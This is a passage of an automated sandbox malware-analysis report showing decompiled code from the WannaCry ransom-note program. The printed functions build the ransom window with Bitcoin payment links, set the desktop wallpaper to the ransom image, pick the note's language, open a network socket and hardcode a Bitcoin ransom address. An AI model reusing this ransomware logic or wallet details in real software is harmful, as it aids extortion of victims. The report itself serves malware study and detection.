                                                      				} else {
                                                      					_t245 = 0;
                                                      				}
                                                      				_t143 = SendMessageA( *(_t142 + 0x20), 0x30, _t245, 1);
                                                      				_push(0x3fa);
                                                      				L00412CE6();
                                                      				if(_t352 != 0) {
                                                      					_t352 =  *(_t352 + 4);
                                                      				}
                                                      				_t145 = SendMessageA( *(_t143 + 0x20), 0x30, _t352, 1);
                                                      				_push(0x402);
                                                      				L00412CE6();
                                                      				if(_t216 != 0) {
                                                      					_t248 =  *(_t216 + 4);
                                                      				} else {
                                                      					_t248 = 0;
                                                      				}
                                                      				_t146 = SendMessageA( *(_t145 + 0x20), 0x30, _t248, 1);
                                                      				_push(0x3ef);
                                                      				L00412CE6();
                                                      				if(_t216 != 0) {
                                                      					_t251 =  *(_t216 + 4);
                                                      				} else {
                                                      					_t251 = 0;
                                                      				}
                                                      				_t147 = SendMessageA( *(_t146 + 0x20), 0x30, _t251, 1); // executed
                                                      				_push(0x3eb);
                                                      				L00412CE6();
                                                      				if(_t216 != 0) {
                                                      					_t253 =  *(_t216 + 4);
                                                      				} else {
                                                      					_t253 = 0;
                                                      				}
                                                      				_t149 = SendMessageA( *(_t147 + 0x20), 0x30, _t253, 1);
                                                      				_push(0x3ec);
                                                      				L00412CE6();
                                                      				if(_t216 != 0) {
                                                      					_t216 =  *(_t216 + 4);
                                                      				}
                                                      				SendMessageA( *(_t149 + 0x20), 0x30, _t216, 1);
                                                      				_push(_t348 + 0x5be);
                                                      				L00412DA0();
                                                      				E00404260(_t348 + 0x228,  *(_t348 + 0x824) ^ 0x00ffffff);
                                                      				E00404260(_t348 + 0x290,  *(_t348 + 0x824) ^ 0x00ffffff);
                                                      				E00404260(_t348 + 0x2f8,  *(_t348 + 0x824) ^ 0x00ffffff);
                                                      				_t260 = _t348 + 0x360;
                                                      				E00404260(_t260,  *(_t348 + 0x824) ^ 0x00ffffff);
                                                      				_push(_t260);
                                                      				 *((intOrPtr*)(_t356 + 0x18)) = _t356;
                                                      				L00412CAA();
                                                      				_t262 = _t348 + 0x228;
                                                      				E00404210(_t262, "https://en.wikipedia.org/wiki/Bitcoin");
                                                      				_push(_t262);
                                                      				 *((intOrPtr*)(_t356 + 0x18)) = _t356;
                                                      				L00412CAA();
                                                      				E00404210(_t348 + 0x290, "https://www.google.com/search?q=how+to+buy+bitcoin");
                                                      				L00412DA6();
                                                      				_push(_t348 + 0x58c);
                                                      				_push("mailto:%s");
                                                      				_push(_t356 + 0x10);
                                                      				 *(_t356 + 0xf8) = 0;
                                                      				L00412E00();
                                                      				_t357 = _t356 + 8;
                                                      				 *((intOrPtr*)(_t357 + 0x18)) = _t357;
                                                      				L00412F56();
                                                      				E00404210(_t348 + 0x2f8, _t357 + 0x14);
                                                      				E00404270(_t348 + 0x888);
                                                      				_push( *((intOrPtr*)(_t348 + 0x508)));
                                                      				_push("http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s");
                                                      				_push(_t357 + 0x10); // executed
                                                      				L00412E00(); // executed
                                                      				_t358 = _t357 + 8;
                                                      				 *((intOrPtr*)(_t358 + 0x18)) = _t358;
                                                      				L00412F56();
                                                      				E00404210(_t348 + 0x360, _t358 + 0x14);
                                                      				SendMessageA( *(_t348 + 0x140), 0x406, 0, 0x64);
                                                      				SendMessageA( *(_t348 + 0x1c4), 0x406, 0, 0x64);
                                                      				_push(0xffffffff);
                                                      				_push(2);
                                                      				L00412F50();
                                                      				_push(0xffffffff);
                                                      				_push(2);
                                                      				 *( *(_t348 + 0x164)) = 0xe0;
                                                      				( *(_t348 + 0x164))[1] = 0xe000;
                                                      				L00412F50();
                                                      				 *( *(_t348 + 0x1e8)) = 0xe0;
                                                      				( *(_t348 + 0x1e8))[1] = 0xe000;
                                                      				_t342 = _t348 + 0x3c8;
                                                      				E00405820(_t348 + 0x3c8, 1);
                                                      				E00405800(_t348 + 0x3c8, 0xb);
                                                      				E00405200(_t348 + 0x3c8, 0);
                                                      				_push( *(_t348 + 0x824));
                                                      				E00405920(_t348 + 0x3c8,  *(_t348 + 0x824), 0xffffff);
                                                      				E00405860(_t342, 0xb);
                                                      				E004058C0(_t342, 1);
                                                      				E00405990(_t342, 1, 0x20);
                                                      				E00405180(_t342, "00;00;00;00");
                                                      				_t343 = _t348 + 0x444;
                                                      				E00405820(_t348 + 0x444, 1);
                                                      				E00405800(_t348 + 0x444, 0xb);
                                                      				E00405200(_t348 + 0x444, 0);
                                                      				_push( *(_t348 + 0x824));
                                                      				E00405920(_t348 + 0x444,  *(_t348 + 0x824), 0xffffff);
                                                      				E00405860(_t343, 0xb);
                                                      				E004058C0(_t343, 1);
                                                      				E00405990(_t343, 1, 0x20);
                                                      				E00405180(_t343, "00;00;00;00");
                                                      				GetTimeZoneInformation(_t358 + 0x38); // executed
                                                      				_push(_t358 + 0x28);
                                                      				E00401E60(_t375, ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4) * 4 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4) * 4) * 8 << 7) +  *((intOrPtr*)(_t348 + 0x578)));
                                                      				_t359 = _t358 + 8;
                                                      				SystemTimeToTzSpecificLocalTime(_t359 + 0x3c, _t359 + 0x28, _t359 + 0x18); // executed
                                                      				_push( *(_t359 + 0x24) & 0x0000ffff);
                                                      				_push( *(_t359 + 0x22) & 0x0000ffff);
                                                      				_push( *(_t359 + 0x20) & 0x0000ffff);
                                                      				_push( *(_t359 + 0x1c) & 0x0000ffff);
                                                      				_push( *(_t359 + 0x26) & 0x0000ffff);
                                                      				_push( *(_t359 + 0x26) & 0x0000ffff);
                                                      				_push("%d/%d/%d %02d:%02d:%02d");
                                                      				_push(_t348 + 0x500);
                                                      				L00412E00();
                                                      				_push(_t359 + 0x48);
                                                      				E00401E60(_t375, ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4) * 4 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4) * 4) * 8 << 7) +  *((intOrPtr*)(_t348 + 0x578)));
                                                      				_t360 = _t359 + 0x28;
                                                      				SystemTimeToTzSpecificLocalTime(_t360 + 0x38, _t360 + 0x28, _t360 + 0x18); // executed
                                                      				_push( *(_t360 + 0x24) & 0x0000ffff);
                                                      				_push( *(_t360 + 0x22) & 0x0000ffff);
                                                      				_push( *(_t360 + 0x20) & 0x0000ffff);
                                                      				_push( *(_t360 + 0x20) & 0x0000ffff);
                                                      				_push( *(_t360 + 0x26) & 0x0000ffff);
                                                      				_push( *(_t360 + 0x26) & 0x0000ffff);
                                                      				_t214 = _t348 + 0x504;
                                                      				_push("%d/%d/%d %02d:%02d:%02d");
                                                      				_push(_t214);
                                                      				L00412E00();
                                                      				_t361 = _t360 + 0x20;
                                                      				_push(0); // executed
                                                      				L00412E06(); // executed
                                                      				 *((intOrPtr*)(_t361 + 0xec)) = 0xffffffff;
                                                      				L00412CC2();
                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t361 + 0xe4));
                                                      				return _t214;
                                                      			}






































                                                      APIs
                                                        • Part of subcall function 004076A0: time.MSVCRT ref: 004076DA
                                                      • CreateSolidBrush.GDI32(000000E0), ref: 00406FB3
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00406FBC
                                                      • CreateSolidBrush.GDI32(00121284), ref: 00406FC6
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00406FCF
                                                      • CreateSolidBrush.GDI32(0000E000), ref: 00406FD9
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00406FE2
                                                      • CreateSolidBrush.GDI32(00E00000), ref: 00406FEC
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00406FF5
                                                      • CreateSolidBrush.GDI32(00000000), ref: 00406FFC
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00407005
                                                      • CreateSolidBrush.GDI32(003834D1), ref: 0040700F
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00407018
                                                      • CreateSolidBrush.GDI32(00107C10), ref: 00407022
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 0040702B
                                                      • CreateSolidBrush.GDI32(00E8A200), ref: 00407035
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 0040703E
                                                      • CreateSolidBrush.GDI32(00D77800), ref: 00407048
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00407051
                                                      • CreateSolidBrush.GDI32(00003CDA), ref: 0040705B
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00407064
                                                      • CreateFontA.GDI32(00000018,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00407097
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 0040709C
                                                      • CreateFontA.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 004070C9
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 004070CE
                                                      • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 004070FB
                                                      • #1641.MFC42(00000000,?,767B20C0,?), ref: 00407104
                                                      • #3092.MFC42(000003ED,00000000,?,767B20C0,?), ref: 00407110
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040712B
                                                      • #3092.MFC42(000003FE,?,767B20C0,?), ref: 00407134
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040714D
                                                      • #3092.MFC42(000003FB,?,767B20C0,?), ref: 00407156
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040716F
                                                      • #3092.MFC42(000003FF,?,767B20C0,?), ref: 00407178
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407191
                                                      • #3092.MFC42(000003FC,?,767B20C0,?), ref: 0040719A
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071B3
                                                      • #3092.MFC42(00000400,?,767B20C0,?), ref: 004071BC
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071D5
                                                      • #3092.MFC42(000003FA,?,767B20C0,?), ref: 004071DE
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071F3
                                                      • #3092.MFC42(00000402,?,767B20C0,?), ref: 004071FC
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407215
                                                      • #3092.MFC42(000003EF,?,767B20C0,?), ref: 0040721E
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407237
                                                      • #3092.MFC42(000003EB,?,767B20C0,?), ref: 00407240
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407259
                                                      • #3092.MFC42(000003EC,?,767B20C0,?), ref: 00407262
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407277
                                                      • #860.MFC42(?,?,767B20C0,?), ref: 00407288
                                                      • #537.MFC42(https://en.wikipedia.org/wiki/Bitcoin,?,?,?,767B20C0,?), ref: 004072F9
                                                      • #537.MFC42(https://www.google.com/search?q=how+to+buy+bitcoin,?,?,?,?,767B20C0,?), ref: 00407315
                                                      • #540.MFC42(?,?,?,?,767B20C0,?), ref: 00407329
                                                      • #2818.MFC42(?,mailto:%s,?,?,?,?,?,767B20C0,?), ref: 0040734A
                                                      • #535.MFC42(?), ref: 0040735D
                                                      • #2818.MFC42(?,http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s,00000000), ref: 00407385
                                                      • #535.MFC42(?), ref: 00407398
                                                        • Part of subcall function 00404210: #858.MFC42(?,?,00413788,000000FF), ref: 00404235
                                                        • Part of subcall function 00404210: #800.MFC42(?,?,00413788,000000FF), ref: 00404246
                                                      • SendMessageA.USER32(?,00000406,00000000,00000064), ref: 004073B8
                                                      • SendMessageA.USER32(?,00000406,00000000,00000064), ref: 004073CA
                                                      • #6140.MFC42(00000002,000000FF), ref: 004073D6
                                                      • #6140.MFC42(00000002,000000FF,00000002,000000FF), ref: 004073FF
                                                        • Part of subcall function 00405860: GetClientRect.USER32(?,?), ref: 0040587E
                                                        • Part of subcall function 00405860: #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 004058A5
                                                        • Part of subcall function 004058C0: GetClientRect.USER32(?,?), ref: 004058DE
                                                        • Part of subcall function 004058C0: #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 00405905
                                                        • Part of subcall function 00405180: _mbscmp.MSVCRT ref: 00405191
                                                        • Part of subcall function 00405180: #860.MFC42(?), ref: 004051A1
                                                        • Part of subcall function 00405180: RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
                                                        • Part of subcall function 00405180: InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
                                                      • GetTimeZoneInformation.KERNELBASE(?,0000000B,00000001,0000000B,00000001,00000002,000000FF,00000002,000000FF), ref: 004074DA
                                                        • Part of subcall function 00401E60: VariantTimeToSystemTime.OLEAUT32(?), ref: 00401E7B
                                                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?), ref: 00407520
                                                      • #2818.MFC42(?,%d/%d/%d %02d:%02d:%02d,?,?,?,?,?,?), ref: 0040756E
                                                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?), ref: 004075AD
                                                      • #2818.MFC42(?,%d/%d/%d %02d:%02d:%02d,?,?,?,?,?,?), ref: 004075FB
                                                      • #6334.MFC42(00000000), ref: 00407607
                                                      • #800.MFC42 ref: 0040761B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #1641CreateMessageSend$#3092$BrushSolid$Time$#2818$FontRectSystem$#535#537#6140#6197#800#860ClientLocalSpecific$#540#6334#858InformationInvalidateRedrawVariantWindowZone_mbscmptime
                                                      • String ID: %d/%d/%d %02d:%02d:%02d$00;00;00;00$Arial$http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s$https://en.wikipedia.org/wiki/Bitcoin$https://www.google.com/search?q=how+to+buy+bitcoin$mailto:%s
                                                      • API String ID: 28786460-3869059234
                                                      • Opcode ID: 200e83b7d3820b486b06c35be801168636e9bf215e2def9df31dd5cd78b3127c
                                                      • Instruction ID: 980e8df72422c457d288d06354c1d21c6ecb0c69e0d4732a7e3947204bb0ebed
                                                      • Opcode Fuzzy Hash: 200e83b7d3820b486b06c35be801168636e9bf215e2def9df31dd5cd78b3127c
                                                      • Instruction Fuzzy Hash: DB02D3B0344705ABD624EB61CC92FBF339AAFC4B04F00452DF2566B2D1DEB8B5058B99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      [Control-flow graph of the function at 0040D6A0; legend: Executed / Not Executed]
                                                      APIs
                                                      • htons.WS2_32 ref: 0040D6C7
                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 0040D6E1
                                                      • bind.WS2_32(00000000,?,00000010), ref: 0040D709
                                                      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D728
                                                      • connect.WS2_32(00000000,?,00000010), ref: 0040D73A
                                                      • select.WS2_32(00000001,?,?,00000000,00000001), ref: 0040D781
                                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040D791
                                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040D7A3
                                                      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D7BB
                                                      • setsockopt.WS2_32(00000000), ref: 0040D7DD
                                                      • setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 0040D7F1
                                                      • closesocket.WS2_32(00000000), ref: 0040D80E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ioctlsocketsetsockopt$bindclosesocketconnecthtonsselectsocket
                                                      • String ID: `
                                                      • API String ID: 478405425-1850852036
                                                      • Opcode ID: 207a0d99be8aa74ddfaa5851ea6aa8d1a80ed73a610e947c43882b9ed202ce50
                                                      • Instruction ID: 6de462713d41b41c0891f3cf9d152f402d0f08cb5dc9382bbec9442f00cca922
                                                      • Opcode Fuzzy Hash: 207a0d99be8aa74ddfaa5851ea6aa8d1a80ed73a610e947c43882b9ed202ce50
                                                      • Instruction Fuzzy Hash: 83418372504341AED320DF55DC84EEFB7E8EFC8714F40892EF558D6290E7B495088BAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 62%
                                                      			E00407E80() {
                                                      				void _v518;
                                                      				short _v520;
                                                      				short _v540;
                                                      				void _v1038;
                                                      				char _v1040;
                                                      				long _v1060;
                                                      				void _v1558;
                                                      				short _v1560;
                                                      				long _v1580;
                                                      				int _t23;
                                                      				short _t39;
                                                      				void* _t42;
                                                      				void* _t54;
                                                      				void* _t55;
                                                      
                                                      				_t39 =  *0x42179c; // 0x0
                                                      				_v1040 = _t39;
                                                      				memset( &_v1038, 0, 0x81 << 2);
                                                      				asm("stosw");
                                                      				_v1560 = _t39;
                                                      				memset( &_v1558, 0, 0x81 << 2);
                                                      				asm("stosw");
                                                      				_v520 = _t39;
                                                      				memset( &_v518, 0, 0x81 << 2);
                                                      				asm("stosw");
                                                      				__imp__SHGetFolderPathW(0, 0, 0, 0,  &_v1040, _t42); // executed
                                                      				_t23 = wcslen( &_v1060);
                                                      				_t54 =  &_v1560 + 0x28;
                                                      				if(_t23 != 0) {
                                                      					_push(L"@WanaDecryptor@.bmp");
                                                      					swprintf( &_v1580, L"%s\\%s",  &_v1060);
                                                      					_t55 = _t54 + 0x10;
                                                      					MultiByteToWideChar(0, 0, "b.wnry", 0xffffffff,  &_v540, 0x103);
                                                      					CopyFileW( &_v540, _t55, 0); // executed
                                                      					return SystemParametersInfoW(0x14, 0, _t55, 1);
                                                      				} else {
                                                      					return _t23;
                                                      				}
                                                      			}


















                                                      APIs
                                                      • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00407EE6
                                                      • wcslen.MSVCRT ref: 00407EF4
                                                      • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.bmp), ref: 00407F20
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,b.wnry,000000FF,?,00000103), ref: 00407F41
                                                      • CopyFileW.KERNELBASE(?,?,00000000), ref: 00407F56
                                                      • SystemParametersInfoW.USER32(00000014,00000000,?,00000001), ref: 00407F67
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharCopyFileFolderInfoMultiParametersPathSystemWideswprintfwcslen
                                                      • String ID: %s\%s$@WanaDecryptor@.bmp$b.wnry
                                                      • API String ID: 13424474-2236924158
                                                      • Opcode ID: 620144e10b90fbdcf7842e1a5c35e3d362372363debefcfb0e035a8d8bd61632
                                                      • Instruction ID: 08a18ced9c3675786ff634b79335ab73d5ba80fa93599351ce40df3d96d25247
                                                      • Opcode Fuzzy Hash: 620144e10b90fbdcf7842e1a5c35e3d362372363debefcfb0e035a8d8bd61632
                                                      • Instruction Fuzzy Hash: 7E21F075204304BAE36087A4CC05FE773AAAFD4700F508938B359961E1EAB16154875B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 86%
                                                      			E00406C20(void* __ecx) {
                                                      				void _v51;
                                                      				void* _v52;
                                                      				signed int _t14;
                                                      				long _t17;
                                                      				void* _t26;
                                                      				char* _t30;
                                                      				unsigned int _t36;
                                                      				signed int _t37;
                                                      				void* _t55;
                                                      
                                                      				_t26 = __ecx;
                                                      				_v52 = 0;
                                                      				memset( &_v51, 0, 0xc << 2);
                                                      				asm("stosb");
                                                      				_t14 = GetUserDefaultLangID();
                                                      				_t30 =  &_v52;
                                                      				if(GetLocaleInfoA(_t14 & 0x0000ffff, 0x1001, _t30, 0x32) == 0) {
                                                      					asm("repne scasb");
                                                      					_t36 =  !(_t30 | 0xffffffff);
                                                      					_t55 = "English" - _t36;
                                                      					_t37 = _t36 >> 2;
                                                      					memcpy(_t55 + _t37 + _t37, _t55, memcpy( &_v52, _t55, _t37 << 2) & 0x00000003);
                                                      				}
                                                      				_t17 = SendMessageA( *(_t26 + 0x80), 0x158, 0,  &_v52); // executed
                                                      				if(_t17 != 0xffffffff) {
                                                      					SendMessageA( *(_t26 + 0x80), 0x14d, 0,  &_v52); // executed
                                                      					return E00406AE0(_t26);
                                                      				} else {
                                                      					SendMessageA( *(_t26 + 0x80), 0x14e, 0, 0);
                                                      					return E00406AE0(_t26);
                                                      				}
                                                      			}













                                                      APIs
                                                      • GetUserDefaultLangID.KERNEL32 ref: 00406C3B
                                                      • GetLocaleInfoA.KERNEL32(00000000,00001001,00000000,00000032), ref: 00406C53
                                                      • SendMessageA.USER32(?,00000158,00000000,00000000), ref: 00406C9A
                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00406CB1
                                                      • SendMessageA.USER32(?,0000014D,00000000,00000000), ref: 00406CD4
                                                        • Part of subcall function 00406AE0: #540.MFC42(?,767B20C0), ref: 00406B03
                                                        • Part of subcall function 00406AE0: #3874.MFC42 ref: 00406B1B
                                                        • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B29
                                                        • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406B41
                                                        • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406B59
                                                        • Part of subcall function 00406AE0: #800.MFC42(?,?,767B20C0), ref: 00406B62
                                                        • Part of subcall function 00406AE0: #800.MFC42 ref: 00406B73
                                                        • Part of subcall function 00406AE0: GetFileAttributesA.KERNELBASE(?), ref: 00406B7D
                                                        • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B91
                                                        • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406BA9
                                                        • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406BBB
                                                        • Part of subcall function 00406AE0: #800.MFC42(?,?,?,?,?,767B20C0), ref: 00406BC4
                                                        • Part of subcall function 00406AE0: #800.MFC42 ref: 00406BD5
                                                        • Part of subcall function 00406AE0: #800.MFC42(?), ref: 00406BF5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$MessageSend$#537#924sprintf$#3874#540AttributesDefaultFileInfoLangLocaleUser
                                                      • String ID: English
                                                      • API String ID: 600832625-3812506524
                                                      • Opcode ID: 98bbcc99f84d21185ee3b515649f036d805e480a8587630640b34afead2fff3e
                                                      • Instruction ID: 12cb8a10269d81aa60d086da51d7e65d8080bc449a50ca3d57c6290c1d86febe
                                                      • Opcode Fuzzy Hash: 98bbcc99f84d21185ee3b515649f036d805e480a8587630640b34afead2fff3e
                                                      • Instruction Fuzzy Hash: F911D3717402006BEB149634DC42BAB7795EBD4720F54863EFE5AEB2D0D9F8A8098794
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      [Control-flow graph of the function at 004064D0; legend: Executed / Not Executed]
                                                      C-Code - Quality: 71%
                                                      			E004064D0(intOrPtr __ecx, void* __fp0) {
                                                      				char _v1032;
                                                      				char _v1424;
                                                      				void _v2256;
                                                      				void _v2456;
                                                      				void _v2707;
                                                      				char _v2708;
                                                      				intOrPtr _v2720;
                                                      				short _v2724;
                                                      				int _t48;
                                                      				int _t49;
                                                      				intOrPtr* _t50;
                                                      				intOrPtr _t60;
                                                      				intOrPtr _t63;
                                                      				intOrPtr _t66;
                                                      				short _t70;
                                                      				void* _t82;
                                                      				char* _t87;
                                                      				char* _t89;
                                                      				intOrPtr _t90;
                                                      				intOrPtr _t98;
                                                      				intOrPtr _t99;
                                                      				intOrPtr _t100;
                                                      				intOrPtr _t105;
                                                      				char _t122;
                                                      				intOrPtr _t134;
                                                      				intOrPtr _t135;
                                                      				intOrPtr _t136;
                                                      				intOrPtr* _t140;
                                                      				intOrPtr* _t141;
                                                      				intOrPtr* _t142;
                                                      				intOrPtr* _t161;
                                                      				intOrPtr* _t162;
                                                      				intOrPtr* _t163;
                                                      				void* _t165;
                                                      				void* _t167;
                                                      				intOrPtr* _t168;
                                                      				void* _t169;
                                                      				void* _t170;
                                                      				void* _t171;
                                                      				void* _t201;
                                                      
                                                      				_t201 = __fp0;
                                                      				_t90 = __ecx; // executed
                                                      				L00412CB0(); // executed
                                                      				SendMessageA( *(__ecx + 0x20), 0x80, 1,  *(__ecx + 0x82c)); // executed
                                                      				SendMessageA( *(_t90 + 0x20), 0x80, 0,  *(_t90 + 0x82c)); // executed
                                                      				_t48 = E00401C70(0);
                                                      				_t170 = _t169 + 4;
                                                      				if(_t48 == 0) {
                                                      					_t122 =  *0x421798; // 0x0
                                                      					_v2708 = _t122;
                                                      					memset( &_v2707, _t48, 0x40 << 2);
                                                      					asm("stosw");
                                                      					asm("stosb");
                                                      					GetModuleFileNameA(0,  &_v2708, 0x104);
                                                      					_t87 = strrchr( &_v2708, 0x5c);
                                                      					_t170 = _t170 + 0x14;
                                                      					if(_t87 != 0) {
                                                      						_t89 = strrchr( &_v2708, 0x5c);
                                                      						_t170 = _t170 + 8;
                                                      						 *_t89 = 0;
                                                      					}
                                                      					SetCurrentDirectoryA( &_v2708);
                                                      				}
                                                      				_t167 = _t90 + 0x50c;
                                                      				_t49 = E00401A10(_t167, 1);
                                                      				_t171 = _t170 + 8;
                                                      				if(_t49 == 0) {
                                                      					memset(_t167, _t49, 0xc3 << 2);
                                                      					asm("repne scasb");
                                                      					_t165 = "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94";
                                                      					_t82 = memcpy(_t165 + 0x175b75a, _t165, memcpy(_t90 + 0x5be, _t165, 0 << 2) & 0x00000003);
                                                      					 *((intOrPtr*)(_t90 + 0x584)) = 0x43960000;
                                                      					 *(_t90 + 0x588) = 0;
                                                      					__imp__time(0);
                                                      					 *(_t90 + 0x578) = _t82;
